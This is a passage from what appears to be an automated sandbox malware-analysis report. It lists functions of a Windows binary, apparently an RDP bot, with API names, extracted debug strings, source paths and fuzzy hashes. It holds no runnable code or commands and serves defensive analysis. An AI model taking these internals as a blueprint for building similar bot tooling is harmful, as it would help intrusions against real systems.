                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                    • API String ID: 1799206407-3397184676
                    • Opcode ID: baf9bcd109b08fa33917cbaf3f54a6df870c21eba6df94bf0d70ffd8db40767f
                    • Instruction ID: b1241ed532a439c0f6b328a13cd03e976e0d0c7d8b4e9f18fea41d67ad1f7484
                    • Opcode Fuzzy Hash: baf9bcd109b08fa33917cbaf3f54a6df870c21eba6df94bf0d70ffd8db40767f
                    • Instruction Fuzzy Hash: 32516E6190CA1781FA217F47ACC4F78E2506F09B94ED80936CE5E069D4EFADBDB58321
                    Function 00007FF704896776 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                    • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                    • API String ID: 1721699506-2819899730
                    • Opcode ID: b38718f50570cfcf9c030a9ff5d0cf2f31db1b60abe9660199959e10cb2c9e68
                    • Instruction ID: 3ca7a058fd5e800b853e3e96b27c2f9b6a7ad8ee5052ddb14401adeebd03d2fa
                    • Opcode Fuzzy Hash: b38718f50570cfcf9c030a9ff5d0cf2f31db1b60abe9660199959e10cb2c9e68
                    • Instruction Fuzzy Hash: 45617E62A0C94791FA20AF56EC84BB8A2516F84744FDD4836C50D276D0EFBCFDB58324
                    Function 00007FF704891A19 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 103COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: ErrorLast$Resource$FindLoadfflushfwrite
                    • String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
                    • API String ID: 2123903355-2019010457
                    • Opcode ID: c8e15383170f05e62394b630eadd2af80a129cbfe18894d6766f073c86ee11a2
                    • Instruction ID: 8941aab699c150ce17a02f678711747f1c5b2e31d3b3e005da5b43fa5a8c3206
                    • Opcode Fuzzy Hash: c8e15383170f05e62394b630eadd2af80a129cbfe18894d6766f073c86ee11a2
                    • Instruction Fuzzy Hash: A4410E72A086428AE760EF66EC80969B7E1EF08754F940A35DA5C837D4EB7CE964C710
                    Function 00007FF7048965E3 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: strlen
                    • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                    • API String ID: 39653677-3302659514
                    • Opcode ID: b9c431ac8d9c02557a8d97dfce453b2c92b9229b81c887f7d29e4938a6881aa5
                    • Instruction ID: 28f5dd5af77c21ab047178c7e5f5616813ef08a21e664a2c3988a637a9d50700
                    • Opcode Fuzzy Hash: b9c431ac8d9c02557a8d97dfce453b2c92b9229b81c887f7d29e4938a6881aa5
                    • Instruction Fuzzy Hash: D3414E62A0C94391FA11AF56AC80BB4E251BF40744FDC4A32D65D1B2D5EFBCB9368360
                    Function 00007FF70489A3E1 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 89memorystringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Heap$Processstrlen$AllocFree
                    • String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                    • API String ID: 1318626975-3964590784
                    • Opcode ID: 04e016d4558c1e8b16952a0a78cd4064b8387b1813da11ceb61ead65e5897593
                    • Instruction ID: 7fbecaa9ed08154acc200c11677aa28e21cd95c1c58f4f3d8add76cb8e1eaf9f
                    • Opcode Fuzzy Hash: 04e016d4558c1e8b16952a0a78cd4064b8387b1813da11ceb61ead65e5897593
                    • Instruction Fuzzy Hash: DE316122A08E8794F655BF13AC88BA9A290AF40B84FDC4431D94D17AD5DF7CFC758360
                    Function 00007FF704893B64 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: AttributesFile$ErrorLast
                    • String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
                    • API String ID: 365566950-3085771803
                    • Opcode ID: a731d91530fa155410fbd8bcd453fcef810afbdb8ae343ea91992bf55f7a59a9
                    • Instruction ID: a29c63cb9a2f815f4a2ef8ee526bbd1c4088a5f16b407b831507bcb0478b1006
                    • Opcode Fuzzy Hash: a731d91530fa155410fbd8bcd453fcef810afbdb8ae343ea91992bf55f7a59a9
                    • Instruction Fuzzy Hash: 18518F61A0CE4386FA60BF56ACC0A79E251AF08348F984832DD1E866D5DF6CFD71C721
                    Function 00007FF704896263 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 113fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
                    • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                    • API String ID: 497672076-1436771859
                    • Opcode ID: 7d2dae4e158726168d386117475a021dd06651b188776e8f94b674e542ac5f80
                    • Instruction ID: a0e30cc82c835660daf355f7ba9ecb941260b6a5605932e1c46f4c6db5fb10e1
                    • Opcode Fuzzy Hash: 7d2dae4e158726168d386117475a021dd06651b188776e8f94b674e542ac5f80
                    • Instruction Fuzzy Hash: D3417361B0C94781FA20AF5BECC0EB8D351AF50B58F984A32C51D275D1AF6CBD729321
                    Function 00007FF704898008 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 84memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocCriticalFileSection$AttributesCopyEnterFreeLeavefflushfwritememcpywcslen
                    • String ID: [E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
                    • API String ID: 4155868088-3920367287
                    • Opcode ID: 19f4e89641a825ba8e6a8e3527bfb194d15c9b43ee916fb46d47d2c48247caca
                    • Instruction ID: 1102ecedf2a496ac4dc91d93d03e1f41453a90b75ded682d639962b2c62d0ced
                    • Opcode Fuzzy Hash: 19f4e89641a825ba8e6a8e3527bfb194d15c9b43ee916fb46d47d2c48247caca
                    • Instruction Fuzzy Hash: C8313322A18A4791F624BF17EC80B79A251AF45B80F888931CA4D477D1EF7CFDA5C320
                    Function 00007FF704896A5C Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: ErrorFileLastModuleName
                    • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path$wfpblk.lock
                    • API String ID: 2776309574-2006444783
                    • Opcode ID: 493bcf6223beb6763dbda43352a8d64f615995933f30e362c3f552b2238180be
                    • Instruction ID: 13c93c9ccaeb40f28d53be70790e5f6e9f63733fc0a1a4609297a936b399a1be
                    • Opcode Fuzzy Hash: 493bcf6223beb6763dbda43352a8d64f615995933f30e362c3f552b2238180be
                    • Instruction Fuzzy Hash: 21310862A0894795FB11BF16ED80FB4A291BF04758FC84932EA4C575D1EFBCA975C320
                    Function 00007FF704895923 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: ErrorFileLast$CloseCreateHandleSize
                    • String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                    • API String ID: 3555958901-1687387729
                    • Opcode ID: d18fac45b14cf10bbf4c722dcfb8da80885c7e019db0d3d867bd787882fa545c
                    • Instruction ID: 49f3698f14fdc481fdd94c504e69f654de9ae5d58b5a3a20c01709ce51d3b413
                    • Opcode Fuzzy Hash: d18fac45b14cf10bbf4c722dcfb8da80885c7e019db0d3d867bd787882fa545c
                    • Instruction Fuzzy Hash: ED613E53E0D913A2FA226E16ACC4B7892505F41378FAD4D36C85E8B2D0DF6DBCA44272
                    Function 00007FF704893222 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 87synchronizationCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: ErrorLastObjectSingleWait
                    • String ID: $(pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu)$process_wait$~
                    • API String ID: 1211598281-4195011794
                    • Opcode ID: e614e6465d37558f7135f5dc73c12c5e46b17844bf3c93edc2c800c8d8d16f3e
                    • Instruction ID: 50805e59d9c4af91caad0ecd0a1af27d922e4c42a0faa62c6d9ddfc2277f1c6c
                    • Opcode Fuzzy Hash: e614e6465d37558f7135f5dc73c12c5e46b17844bf3c93edc2c800c8d8d16f3e
                    • Instruction Fuzzy Hash: D531FD11E0CA0382FB747F9AACC4B7892409F4C315EE85932CE1F466D19F9DBDB59261
                    Function 00007FF704895C44 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 129filetimeCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: File$CloseCreateErrorHandleLastTime
                    • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
                    • API String ID: 2291555494-3647951244
                    • Opcode ID: d05849413dc51ef2d9fca7690cede0a83bfffe58287aac246e24bd13c564f661
                    • Instruction ID: 40d20484eba431830571d2ffbf5787f04439e205f27db4a2a03916e40484447b
                    • Opcode Fuzzy Hash: d05849413dc51ef2d9fca7690cede0a83bfffe58287aac246e24bd13c564f661
                    • Instruction Fuzzy Hash: B7516263D0C903A6FB226E12ACC8B78D2906F007A8F9C4E31D91D4B2D4DF6DBD658361
                    Function 00007FF70489A264 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: _errno$_strtoui64
                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                    • API String ID: 3513630032-2210897324
                    • Opcode ID: 589a136158d6230515a1194aa1ded0d18727e1947aff480698b1c5f8eabd8088
                    • Instruction ID: 0ec73aee0d6819d65d4991ce573dd4ab387235e3ff8b319d8e81734dba072647
                    • Opcode Fuzzy Hash: 589a136158d6230515a1194aa1ded0d18727e1947aff480698b1c5f8eabd8088
                    • Instruction Fuzzy Hash: B5218222608A8796F355AF56FC80BAAB361BF44784F884432EE4C47794DF7DE8A5C710
                    Function 00007FF70489A824 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Virtual$ErrorLastProtectQuery
                    • String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                    • API String ID: 637304234-2693646698
                    • Opcode ID: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
                    • Instruction ID: 2059ff460e1d3424c9feeac6a2f123c990abf6a1583e46be0fca4a85c9005a4b
                    • Opcode Fuzzy Hash: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
                    • Instruction Fuzzy Hash: 1B31A222B05A4242EA04AF16ECC1978A361FF44B84B888935DD1C473E4DF3CF876C350
                    Function 00007FF704899F70 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 70COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: _errno
                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                    • API String ID: 2918714741-1991603811
                    • Opcode ID: 3920f8d66e3a10739eb1f1376af4a68c38db9251a04340267e2f2ef4fec26f98
                    • Instruction ID: c6ea8aca907176ac568ece3e421fc85e47750a44ff264e0e44b04a4821cfd09d
                    • Opcode Fuzzy Hash: 3920f8d66e3a10739eb1f1376af4a68c38db9251a04340267e2f2ef4fec26f98
                    • Instruction Fuzzy Hash: 3A214F62A08A4792F711AF12ED80FAAA760BF44794F884435EE4C47B94DF7CE9A5C710
                    Function 00007FF70489255D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
